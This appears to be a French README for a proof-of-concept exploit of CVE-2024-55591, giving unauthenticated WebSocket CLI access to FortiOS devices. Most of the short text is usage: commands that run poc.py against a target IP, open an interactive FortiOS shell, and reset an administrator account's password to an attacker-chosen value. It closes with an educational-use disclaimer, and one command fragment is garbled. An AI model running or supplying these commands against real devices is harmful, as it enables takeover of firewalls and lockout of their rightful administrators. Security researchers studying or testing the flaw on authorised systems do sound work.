
Preuve de concept pour CVE-2024-55591, permettant un accès CLI WebSocket non authentifié aux appareils FortiOS, avec shell interactif et réinitialisation du mot de passe administrateur.
Il s'agit d'un outil Proof-of-Concept (PoC) pour exploiter CVE-2024-55591, une vulnérabilité dans FortiOS qui permet un accès non authentifié à la CLI via WebSocket.
--reset-user)python3 poc.py --host <target_ip> --port 443 --ssl
Utilisez ensuite l'invite :
FortiOS# get system status
FortiOS# exit
python3 poc.py --host <target_ip> --port 443 --ssl \
--reset-user Admin2 --new-pass Forti2024!
Avertissement : Cet outil est fourni uniquement à des fins éducatives et de tests autorisés.